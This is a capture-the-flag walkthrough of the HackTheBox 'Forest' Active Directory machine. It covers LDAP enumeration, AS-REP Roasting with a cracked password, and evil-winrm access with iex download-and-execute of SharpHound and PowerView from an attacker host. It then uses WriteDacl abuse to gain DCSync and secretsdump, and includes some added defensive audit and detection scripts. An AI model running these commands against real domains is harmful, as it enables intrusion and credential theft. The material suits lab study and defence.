Information gathering

An nmap scan identifies the domain controller (10.10.10.161):
Not shown: 988 closed tcp ports (reset)
PORT     STATE    SERVICE      VERSION
53/tcp   open     domain       Simple DNS Plus
88/tcp   open     kerberos-sec Microsoft Windows Kerberos (server time: 2022-12-23 14:32:58Z)
135/tcp  open     msrpc        Microsoft Windows RPC
139/tcp  open     netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open     ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open     microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open     kpasswd5?
593/tcp  open     ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open     tcpwrapped
1296/tcp filtered dproxy
3268/tcp open     ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open     tcpwrapped
Aggressive OS guesses: Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Vista SP1 (92%), Microsoft Windows Server 2012 (92%), Microsoft Windows Server 2012 R2 (92%), Microsoft Windows Server 2012 R2 Update 1 (92%), Microsoft Windows Server 2016 build 10586 - 14393 (92%), Microsoft Windows Server 2012 or Server 2012 R2 (91%), Microsoft Windows 10 1507 - 1607 (90%), Microsoft Windows Server 2016 (90%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Use windapsearch on Kali to check whether LDAP allows anonymous bind

Installing windapsearch
https://github.com/Mephostophiles/windapsearch
pip install python-ldap #or apt-get install python-ldap
If installing python-ldap fails:
apt-get update
apt-get install libsasl2-dev python3-dev libldap2-dev libssl-dev
Command: python windapsearch.py -d hb.local --dc-ip 10.10.10.161 -U
-U enumerates users. The result shows that LDAP accepts an anonymous bind and allows user enumeration.
Scan output:
python windapsearch.py -d hb.local --dc-ip 10.10.10.161 -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.161
[+] Getting defaultNamingContext from Root DSE
[+]     Found: DC=htb,DC=local
[+] Attempting bind
[+]     ...success! Binded as:
[+]      None
[+] Enumerating all AD users
[+]     Found 28 users:
cn: Guest
cn: DefaultAccount
cn: Exchange Online-ApplicationAccount
userPrincipalName: Exchange_Online-ApplicationAccount@htb.local
cn: SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}
userPrincipalName: SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}@htb.local
cn: SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}
userPrincipalName: SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}@htb.local
cn: SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}
userPrincipalName: SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@htb.local
cn: DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852}
userPrincipalName: DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852}@htb.local
cn: Migration.8f3e7716-2011-43e4-96b1-aba62d229136
userPrincipalName: Migration.8f3e7716-2011-43e4-96b1-aba62d229136@htb.local
cn: FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042
userPrincipalName: FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@htb.local
cn: SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}
userPrincipalName: SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}@htb.local
cn: SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}
userPrincipalName: SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}@htb.local
cn: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}
userPrincipalName: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}@htb.local
cn: HealthMailboxc3d7722415ad41a5b19e3e00e165edbe
userPrincipalName: HealthMailboxc3d7722415ad41a5b19e3e00e165edbe@htb.local
cn: HealthMailboxfc9daad117b84fe08b081886bd8a5a50
userPrincipalName: HealthMailboxfc9daad117b84fe08b081886bd8a5a50@htb.local
cn: HealthMailboxc0a90c97d4994429b15003d6a518f3f5
userPrincipalName: HealthMailboxc0a90c97d4994429b15003d6a518f3f5@htb.local
cn: HealthMailbox670628ec4dd64321acfdf6e67db3a2d8
userPrincipalName: HealthMailbox670628ec4dd64321acfdf6e67db3a2d8@htb.local
cn: HealthMailbox968e74dd3edb414cb4018376e7dd95ba
userPrincipalName: HealthMailbox968e74dd3edb414cb4018376e7dd95ba@htb.local
cn: HealthMailbox6ded67848a234577a1756e072081d01f
userPrincipalName: HealthMailbox6ded67848a234577a1756e072081d01f@htb.local
cn: HealthMailbox83d6781be36b4bbf8893b03c2ee379ab
userPrincipalName: HealthMailbox83d6781be36b4bbf8893b03c2ee379ab@htb.local
cn: HealthMailboxfd87238e536e49e08738480d300e3772
userPrincipalName: HealthMailboxfd87238e536e49e08738480d300e3772@htb.local
cn: HealthMailboxb01ac647a64648d2a5fa21df27058a24
userPrincipalName: HealthMailboxb01ac647a64648d2a5fa21df27058a24@htb.local
cn: HealthMailbox7108a4e350f84b32a7a90d8e718f78cf
userPrincipalName: HealthMailbox7108a4e350f84b32a7a90d8e718f78cf@htb.local
cn: HealthMailbox0659cc188f4c4f9f978f6c2142c4181e
userPrincipalName: HealthMailbox0659cc188f4c4f9f978f6c2142c4181e@htb.local
cn: Sebastien Caron
userPrincipalName: sebastien@htb.local
cn: Lucinda Berger
userPrincipalName: lucinda@htb.local
cn: Andy Hislip
userPrincipalName: andy@htb.local
cn: Mark Brandt
userPrincipalName: mark@htb.local
cn: Santi Rodriguez
userPrincipalName: santi@htb.local

Use windapsearch with the filter objectClass=* to look for other objects

Command: python windapsearch.py -d hb.local --dc-ip 10.10.10.161 --custom "objectClass=*"
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.161
[+] Getting defaultNamingContext from Root DSE
[+]     Found: DC=htb,DC=local
[+] Attempting bind
[+]     ...success! Binded as:
[+]      None
[+] Performing custom lookup with filter: "objectClass=*"
[+]     Found 312 results:

Key finding: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
The htb.local domain has a service account named svc-alfresco, which can be targeted with an AS-REP Roasting attack.

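AS-REP Roasting attack

Difference between AS-REP Roasting and Kerberoasting
AS-REP Roasting: extracts an account's hash for offline brute-force cracking. The precondition is that the account has "Do not require Kerberos preauthentication" enabled, or uf_dont_require_preauth set to true.
Kerberoasting: usually requires valid domain credentials to authenticate; it extracts service account credential hashes from the domain for offline cracking.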
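The two preconditions above can be audited from a directory export. The following is an added example, not part of the original write-up: it decodes userAccountControl and flags accounts exposed to each technique. The LDIF sample is constructed (the userAccountControl values, the SPNs and the accounts svc-web and old-batch are assumptions for illustration).

```python
import re

# userAccountControl bits (values documented by Microsoft).
UF_ACCOUNTDISABLE = 0x00000002
UF_NORMAL_ACCOUNT = 0x00000200
UF_DONT_REQUIRE_PREAUTH = 0x00400000

# Filter an administrator can run to list only accounts with pre-auth disabled;
# 1.2.840.113556.1.4.803 is Active Directory's bitwise-AND matching rule.
NO_PREAUTH_FILTER = (
    "(&(objectCategory=person)(objectClass=user)"
    f"(userAccountControl:1.2.840.113556.1.4.803:={UF_DONT_REQUIRE_PREAUTH}))"
)

# Constructed sample export. The DNs of svc-alfresco, Sebastien Caron and EXCH01
# appear on the page; all flag values, all SPNs, and the accounts svc-web and
# old-batch are made up for this example.
SAMPLE_LDIF = """\
dn: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
sAMAccountName: svc-alfresco
userAccountControl: 4260352

dn: CN=Sebastien Caron,OU=Exchange Administrators,OU=Information Technology,
 OU=Employees,DC=htb,DC=local
sAMAccountName: sebastien
userAccountControl: 512

dn: CN=svc-web,OU=Service Accounts,DC=htb,DC=local
sAMAccountName: svc-web
userAccountControl: 66048
servicePrincipalName: HTTP/web01.htb.local

dn: CN=old-batch,OU=Service Accounts,DC=htb,DC=local
sAMAccountName: old-batch
userAccountControl: 4194818

dn: CN=EXCH01,CN=Computers,DC=htb,DC=local
sAMAccountName: EXCH01$
userAccountControl: 4096
servicePrincipalName: HOST/EXCH01.htb.local
"""


def parse_ldif(text):
    """Parse a plain (non-base64) LDIF export into a list of {attr: [values]}."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        entry, last = {}, None
        for line in block.splitlines():
            if line.startswith("#"):
                continue
            if line.startswith(" ") and last:  # folded continuation line
                entry[last][-1] += line[1:]
                continue
            attr, _, value = line.partition(":")
            last = attr.strip().lower()
            entry.setdefault(last, []).append(value.strip())
        if entry:
            records.append(entry)
    return records


def audit(records):
    """Return accounts that meet the AS-REP Roasting or Kerberoasting precondition."""
    findings = []
    for entry in records:
        name = entry.get("samaccountname", ["?"])[0]
        uac = int(entry.get("useraccountcontrol", ["0"])[0])
        risks = []
        if uac & UF_DONT_REQUIRE_PREAUTH:
            # Anyone who can reach the KDC can request an AS-REP for this account.
            risks.append("AS-REP roastable")
        is_user = bool(uac & UF_NORMAL_ACCOUNT)  # excludes computer accounts
        if is_user and entry.get("serviceprincipalname") and name.lower() != "krbtgt":
            # Any authenticated domain user can request a service ticket for it.
            risks.append("Kerberoastable")
        if risks:
            findings.append({
                "account": name,
                "enabled": not uac & UF_ACCOUNTDISABLE,
                "risks": risks,
            })
    # Enabled accounts first: they are exposed now, disabled ones only if re-enabled.
    findings.sort(key=lambda f: (not f["enabled"], f["account"]))
    return findings


if __name__ == "__main__":
    print("Audit filter:", NO_PREAUTH_FILTER)
    for f in audit(parse_ldif(SAMPLE_LDIF)):
        state = "enabled" if f["enabled"] else "disabled"
        print(f"{f['account']:<14} {state:<9} {', '.join(f['risks'])}")
```

Accounts flagged as AS-REP roastable should have pre-authentication re-enabled unless an application strictly needs it off; for any flagged service account, a long random password limits what offline cracking can recover.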
Use GetNPUsers.py from the Impacket package to obtain the TGT hash
Download: https://github.com/fortra/impacket
Install: pip install -r requirements.txt
Tool location: impacket-0.10.0/examples/
Usage: python GetNPUsers.py htb.local/svc-alfresco -dc-ip 10.10.10.161 -no-pass
Returned TGT hash:
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB.LOCAL:ed80362bb99a9e6a4ea7ee992099b166$f9765655288e02274cc6883e9220bb2054dda0425366b97d32d2f99b0d6c2e93447fe97b68aff828ad7877818b3347b5d2d6263071442c940d97513794d14f763239e07348093a1c8c66ce3d0b60989f4719e5b4af9b328ec04eb1663b676cecbf2774fac5d6e866bba36f18cf1ed539594a621c1e31a800ba489fe672db5d55479606438471030499747a253f2a48bb88dd98525260835576cef6aa0aeaab13c09d1c654e8ba1c3158fbc2904ca59300c44b4626f7042e1937be3f261cdf93b1f960c74fb316c6180d131f0ca6980c3ca07c09eabfd25b2156f8e56524d4f415ae283ef0feb
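On the domain controller, a TGT issued without pre-authentication is recorded as Security event 4768 with PreAuthType 0 when Kerberos Authentication Service auditing is enabled. The following is an added detection example, not part of the original write-up: it scans exported 4768/4769 events for that pattern. The JSON lines are constructed sample data, and the source addresses and the account old-batch are assumptions.

```python
import json
from collections import defaultdict

RC4_HMAC = 0x17  # etype 23, the encryption type in the $krb5asrep$23$ hash above

# Constructed sample events, one JSON object per line, using the field names
# of Windows Security event 4768. All values are made up for this example.
SAMPLE_EVENTS = """\
{"EventID": 4768, "TimeCreated": "2022-12-23T14:40:01Z", "TargetUserName": "sebastien", "IpAddress": "::ffff:10.10.10.50", "Status": "0x0", "TicketEncryptionType": "0x12", "PreAuthType": "2"}
{"EventID": 4768, "TimeCreated": "2022-12-23T14:41:17Z", "TargetUserName": "nosuchuser", "IpAddress": "::ffff:10.10.14.23", "Status": "0x6", "TicketEncryptionType": "0xffffffff", "PreAuthType": "-"}
{"EventID": 4768, "TimeCreated": "2022-12-23T14:41:18Z", "TargetUserName": "svc-alfresco", "IpAddress": "::ffff:10.10.14.23", "Status": "0x0", "TicketEncryptionType": "0x17", "PreAuthType": "0"}
{"EventID": 4769, "TimeCreated": "2022-12-23T14:42:00Z", "TargetUserName": "sebastien@HTB.LOCAL", "IpAddress": "::ffff:10.10.10.50", "Status": "0x0", "TicketEncryptionType": "0x12"}
{"EventID": 4768, "TimeCreated": "2022-12-23T15:02:44Z", "TargetUserName": "old-batch", "IpAddress": "::ffff:10.10.10.77", "Status": "0x0", "TicketEncryptionType": "0x12", "PreAuthType": "0"}
"""


def load_events(text):
    """Parse newline-delimited JSON events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def normalize_ip(ip):
    """Strip the IPv4-mapped IPv6 prefix that Windows puts in IpAddress."""
    return ip[7:] if ip.startswith("::ffff:") else ip


def detect_asrep_roast(events, sweep_threshold=2):
    """Flag TGTs that were issued without pre-authentication.

    severity is "high" when the ticket used RC4 (fast to crack offline) or when
    one source obtained such tickets for sweep_threshold or more accounts.
    """
    hits = []
    for ev in events:
        # Only successful AS exchanges matter: the encrypted reply left the KDC.
        if ev.get("EventID") != 4768 or ev.get("Status") != "0x0":
            continue
        if str(ev.get("PreAuthType")) != "0":
            continue
        etype = int(ev.get("TicketEncryptionType", "0x0"), 16)
        hits.append({
            "time": ev.get("TimeCreated"),
            "account": ev.get("TargetUserName"),
            "source": normalize_ip(ev.get("IpAddress", "")),
            "rc4": etype == RC4_HMAC,
        })

    # A single source collecting replies for several accounts suggests a sweep.
    accounts_by_source = defaultdict(set)
    for hit in hits:
        accounts_by_source[hit["source"]].add(hit["account"])
    for hit in hits:
        hit["sweep"] = len(accounts_by_source[hit["source"]]) >= sweep_threshold
        hit["severity"] = "high" if hit["rc4"] or hit["sweep"] else "medium"
    return hits


if __name__ == "__main__":
    for alert in detect_asrep_roast(load_events(SAMPLE_EVENTS)):
        print(f"{alert['time']} {alert['severity']:<6} account={alert['account']} "
              f"source={alert['source']} rc4={alert['rc4']} sweep={alert['sweep']}")
```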

Cracking the TGT with hashcat

Usage: hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt --force
Parameters:
hash.txt holds the TGT hash; rockyou is the wordlist (if the crack fails, more passwords can be added to it); --force ignores warnings and errors; -m 18200 sets the hash mode to Kerberos 5, etype 23, AS-REP.
TGT hash: $krb5asrep$23$svc-alfresco@HTB.LOCAL:ed80362bb99a9e6a4ea7ee992099b166$f9765655288e02274cc6883e9220bb2054dda0425366b97d32d2f99b0d6c2e93447fe97b68aff828ad7877818b3347b5d2d6263071442c940d97513794d14f763239e07348093a1c8c66ce3d0b60989f4719e5b4af9b328ec04eb1663b676cecbf2774fac5d6e866bba36f18cf1ed539594a621c1e31a800ba489fe672db5d55479606438471030499747a253f2a48bb88dd98525260835576cef6aa0aeaab13c09d1c654e8ba1c3158fbc2904ca59300c44b4626f7042e1937be3f261cdf93b1f960c74fb316c6180d131f0ca6980c3ca07c09eabfd25b2156f8e56524d4f415ae283ef0feb
Result:
└─# hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt --force
hashcat (v6.2.5) starting
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 2.0 pocl 1.8  Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=====================================================================================================================================
* Device #1: pthread-12th Gen Intel(R) Core(TM) i5-12400F, 1428/2921 MB (512 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Initializing backend runtime for device #1. Please be patient...
Host memory required for this attack: 0 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14342314
* Bytes.....: 139917341
* Keyspace..: 14342306
* Runtime...: 1 sec
$krb5asrep$23$svc-alfresco@HTB.LOCAL:ed80362bb99a9e6a4ea7ee992099b166$f9765655288e02274cc6883e9220bb2054dda0425366b97d32d2f99b0d6c2e93447fe97b68aff828ad7877818b3347b5d2d6263071442c940d97513794d14f763239e07348093a1c8c66ce3d0b60989f4719e5b4af9b328ec04eb1663b676cecbf2774fac5d6e866bba36f18cf1ed539594a621c1e31a800ba489fe672db5d55479606438471030499747a253f2a48bb88dd98525260835576cef6aa0aeaab13c09d1c654e8ba1c3158fbc2904ca59300c44b4626f7042e1937be3f261cdf93b1f960c74fb316c6180d131f0ca6980c3ca07c09eabfd25b2156f8e56524d4f415ae283ef0feb:s3rvice
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB.LOCAL:ed80362bb99a9e...ef0feb
Time.Started.....: Sat Dec 24 07:24:55 2022, (0 secs)
Time.Estimated...: Sat Dec 24 07:24:55 2022, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    24330 H/s (0.52ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 1024/14342306 (0.01%)
Rejected.........: 0/1024 (0.00%)
Restore.Point....: 0/14342306 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> abcd1234
Hardware.Mon.#1..: Util: 45%
Started: Sat Dec 24 07:24:26 2022
Stopped: Sat Dec 24 07:24:57 2022
Recovered plaintext: s3rvice
Cracking with john: john hash.txt --fork=4 -w=/usr/share/wordlists/rockyou.txt
--fork=4 sets the cracking mode to Kerberos
hash.txt is the TGT hash
rockyou is the wordlist
john hash.txt --fork=4 -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Node numbers 1-4 of 4 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice          ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
1 1g 0:00:00:00 DONE (2022-12-24 07:33) 100.0g/s 1600p/s 1600c/s 1600C/s 123456..hello
Waiting for 3 children to terminate
s3rvice          ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
3 1g 0:00:00:02 DONE (2022-12-24 07:33) 0.3597g/s 367263p/s 367263c/s 367263C/s s3tang1tar..s3rena
2 0g 0:00:00:10 DONE (2022-12-24 07:33) 0g/s 356757p/s 356757c/s 356757C/s xCvBnM,..*7¡Vamos!
4 0g 0:00:00:10 DONE (2022-12-24 07:33) 0g/s 356756p/s 356756c/s 356756C/s   c125263.abygurl69
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Viewing earlier results: john --show hash.txt (the hash file that was cracked earlier)
Once john has cracked a hash, running it again only reports that the hash is already cracked; use the command above to display the password recovered earlier.
$krb5asrep$23$svc-alfresco@HTB.LOCAL:s3rvice
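From the defender's side, the request that produced this hash is visible on the domain controller as a successful event 4768 with pre-authentication type 0. The following is an added example, not part of the original write-up: it hunts for such requests in exported Security events, and the one-JSON-object-per-line export format and every sample record are constructed assumptions.

```python
import json

# Constructed sample (not from the original page): domain-controller Security
# events exported as one JSON object per line, using the EventData field names
# of event 4768 ("A Kerberos authentication ticket (TGT) was requested").
SAMPLE_LOG = """\
{"EventID": 4768, "TargetUserName": "svc-alfresco", "IpAddress": "::ffff:10.10.14.26", "TicketEncryptionType": "0x17", "PreAuthType": "0", "Status": "0x0"}
{"EventID": 4768, "TargetUserName": "sebastien", "IpAddress": "::ffff:10.10.10.20", "TicketEncryptionType": "0x12", "PreAuthType": "2", "Status": "0x0"}
{"EventID": 4768, "TargetUserName": "andy", "IpAddress": "::ffff:10.10.10.21", "TicketEncryptionType": "0x12", "PreAuthType": "0", "Status": "0x0"}
{"EventID": 4768, "TargetUserName": "mark", "IpAddress": "::ffff:10.10.14.26", "TicketEncryptionType": "0xffffffff", "PreAuthType": "-", "Status": "0x19"}
{"EventID": 4624, "TargetUserName": "lucinda", "IpAddress": "10.10.10.22"}
this line is truncated {"EventID": 47
"""

RC4_HMAC = 0x17  # etype 23, the type hashcat mode 18200 works on


def _to_int(value):
    """Parse '0x17', '23' or 23; return None for '-' or junk."""
    try:
        return int(str(value), 0)
    except ValueError:
        return None


def find_no_preauth_tgts(log_text):
    """Return successful TGT requests answered without pre-authentication."""
    findings = []
    for line in log_text.splitlines():
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip damaged lines instead of aborting the hunt
        if not isinstance(ev, dict) or ev.get("EventID") != 4768:
            continue
        if _to_int(ev.get("Status")) != 0:
            continue  # failed request, e.g. 0x19 = pre-authentication required
        if _to_int(ev.get("PreAuthType")) != 0:
            continue  # the client proved knowledge of the password first
        etype = _to_int(ev.get("TicketEncryptionType"))
        findings.append({
            "account": ev.get("TargetUserName"),
            "source": ev.get("IpAddress", "").replace("::ffff:", ""),
            "etype": etype,
            # RC4 replies are the cheapest to attack offline, so rank them first
            "severity": "high" if etype == RC4_HMAC else "medium",
        })
    return sorted(findings, key=lambda f: f["severity"] != "high")


if __name__ == "__main__":
    for finding in find_no_preauth_tgts(SAMPLE_LOG):
        print(finding)
```

Every account this reports has "Do not require Kerberos preauthentication" set; clearing that flag, or giving the account a long random password, removes the exposure.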

Logging in with WinRM

Install: gem install evil-winrm
Download: https://github.com/Hackplayers/evil-winrm/releases/tag/v3.3
Command: evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
-i machine IP
-u service account
-p plaintext password recovered by cracking the TGT hash with john or hashcat
Get the user flag:
type c:\Users\svc-alfresco\desktop\user.txt

Finding a privilege path with BloodHound

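Log in over WinRM and load the BloodHound PowerShell collector
1. Serve SharpHound.ps1 on port 80 with Python. In the directory that contains SharpHound.ps1 run:
python3 -m http.server 80
2. Load the PowerShell script in the WinRM session:
iex(new-object net.webclient).downloadstring("http://10.10.14.26/SharpHound.ps1")
Replace 10.10.14.26 with your own address as shown by ip addr.
3. Run the script:
invoke-bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass s3rvice
4. Download the collected data file. In the WinRM session run:
download remote_path local_path
Installing BloodHound:
pip install pycrypto           // dependency
pip install bloodhound         // collector
apt install bloodhound         // the application itself
sudo apt install default-jre    // installs the latest Java; optional
The data can also be collected with this command:
bloodhound-python -d htb.local -u svc-alfresco -p s3rvice -gc forest.htb.local -c all -ns 10.10.10.161
Starting BloodHound:
neo4j start
neo4j/neo4j are the default username and password
Launch bloodhound from the Kali tools menu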
Analysis:
Start: SVC-ALFRESCO@HTB.LOCAL
Target: DOMAIN ADMINS@HTB.LOCAL
Path:
1. SVC-ALFRESCO@HTB.LOCAL                 MemberOf    SERVICE ACCOUNTS@HTB.LOCAL
2. SERVICE ACCOUNTS@HTB.LOCAL             MemberOf    PRIVILEGED IT ACCOUNTS@HTB.LOCAL
3. PRIVILEGED IT ACCOUNTS@HTB.LOCAL       MemberOf    ACCOUNT OPERATORS@HTB.LOCAL
4. ACCOUNT OPERATORS@HTB.LOCAL            GenericAll  EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL
5. EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL   WriteDacl   DOMAIN ADMINS@HTB.LOCAL
The service account under our control, SVC-ALFRESCO@HTB.LOCAL, is in the SERVICE ACCOUNTS@HTB.LOCAL group, and SERVICE ACCOUNTS@HTB.LOCAL is in the PRIVILEGED IT ACCOUNTS@HTB.LOCAL group. ACCOUNT OPERATORS@HTB.LOCAL has full control over the EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL group, and PRIVILEGED IT ACCOUNTS@HTB.LOCAL is a member of ACCOUNT OPERATORS@HTB.LOCAL. The ACCOUNT OPERATORS@HTB.LOCAL rights can therefore be abused to add an account to EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL, and that group can then write a DACL on DOMAIN ADMINS@HTB.LOCAL to complete the privilege escalation.
Summary of the analysis:
1. SVC-ALFRESCO@HTB.LOCAL belongs to the ACCOUNT OPERATORS@HTB.LOCAL group.
2. The ACCOUNT OPERATORS@HTB.LOCAL group has full control over the EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL group.
3. Writing a DACL to the DOMAIN ADMINS@HTB.LOCAL group through the EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL group completes the privilege escalation.
Commands for adding the account:
net group "EXCHANGE TRUSTED SUBSYSTEM" svc-alfresco /add /domain    // add
net group "EXCHANGE TRUSTED SUBSYSTEM"                              // check the membership
Alternatively, create a new account and add it to EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL:
net user hack hack@123 /add /domain
net group "EXCHANGE TRUSTED SUBSYSTEM" hack /add /domain
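The same graph reasoning can be run as an audit. The following is an added example, not BloodHound's own code: it takes the five edges from the analysis above, lists every principal that can reach DOMAIN ADMINS@HTB.LOCAL, and shows which single edges break the path when removed. The function names and the ANDY control edge are assumptions made for the illustration.

```python
from collections import deque

# Edges as listed in the BloodHound analysis above: (source, relation, target).
# The last edge is a constructed control with no route to the target.
EDGES = [
    ("SVC-ALFRESCO@HTB.LOCAL", "MemberOf", "SERVICE ACCOUNTS@HTB.LOCAL"),
    ("SERVICE ACCOUNTS@HTB.LOCAL", "MemberOf", "PRIVILEGED IT ACCOUNTS@HTB.LOCAL"),
    ("PRIVILEGED IT ACCOUNTS@HTB.LOCAL", "MemberOf", "ACCOUNT OPERATORS@HTB.LOCAL"),
    ("ACCOUNT OPERATORS@HTB.LOCAL", "GenericAll", "EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL"),
    ("EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL", "WriteDacl", "DOMAIN ADMINS@HTB.LOCAL"),
    ("ANDY@HTB.LOCAL", "MemberOf", "DOMAIN USERS@HTB.LOCAL"),
]
TARGET = "DOMAIN ADMINS@HTB.LOCAL"


def shortest_path(edges, start, target):
    """Breadth-first search; returns the list of edges walked, or None."""
    adjacency = {}
    for src, rel, dst in edges:
        adjacency.setdefault(src, []).append((rel, dst))
    queue, seen = deque([(start, [])]), {start}
    while queue:
        node, path = queue.popleft()
        if node == target:
            return path
        for rel, dst in adjacency.get(node, []):
            if dst not in seen:
                seen.add(dst)
                queue.append((dst, path + [(node, rel, dst)]))
    return None


def principals_with_path(edges, target):
    """Every node that can reach the target (reverse BFS); these need review."""
    reverse = {}
    for src, _rel, dst in edges:
        reverse.setdefault(dst, []).append(src)
    queue, seen = deque([target]), set()
    while queue:
        for src in reverse.get(queue.popleft(), []):
            if src not in seen:
                seen.add(src)
                queue.append(src)
    return seen


def breaking_edges(edges, start, target):
    """Edges whose removal alone leaves start with no path to target."""
    if shortest_path(edges, start, target) is None:
        return []
    return [e for e in edges
            if shortest_path([x for x in edges if x != e], start, target) is None]


if __name__ == "__main__":
    for src, rel, dst in shortest_path(EDGES, "SVC-ALFRESCO@HTB.LOCAL", TARGET):
        print(f"{src} -[{rel}]-> {dst}")
    print(sorted(principals_with_path(EDGES, TARGET)))
```

On this data every edge of the chain is a breaking edge, so removing either the nested group membership or one of the two ACL grants closes the path.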

Abusing WriteDacl for privilege escalation

Download: abusing WriteDacl requires the PowerSploit toolkit, https://github.com/PowerShellMafia/PowerSploit. The PowerShell script needed is PowerView.ps1, located in the Recon directory.
Process:
In the PowerSploit-3.0.0/Recon directory run:
python3 -m http.server 80
In the evil-winrm shell:
Method 1:
iex(New-Object Net.webclient).downloadstring('http://10.10.16.9/PowerView.ps1')
$pass = convertto-securestring 'hack@123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('HTB\hack', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity hack -Rights DCSync
Method 2:
iex(New-Object Net.webclient).downloadstring('http://10.10.16.9/PowerView.ps1')
net user john abc123! /add /domain
net group "Exchange Windows Permissions" john /add
net localgroup "Remote Management Users" john /add                         // membership of the remote management group allows login over WinRM
$pass = convertto-securestring 'abc123!' -asplain -force
$cred = new-object system.management.automation.pscredential('htb\john',$pass)
Add-ObjectACL -PrincipalIdentity john -Credential $cred -Rights DCSync
If Add-DomainObjectAcl is not recognised, do not use the Latest release downloaded from GitHub; use the master branch downloaded through the Code button instead.
DCSync: use secretsdump.py from the impacket toolkit to perform the DCSync. Version impacket_0_9_22 is recommended; impacket-0.10.0 may be incompatible and fail to run.
impacket-impacket_0_9_22\examples\secretsdump.py
python3 secretsdump.py hack:hack@123@10.10.10.161
Result:
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up...
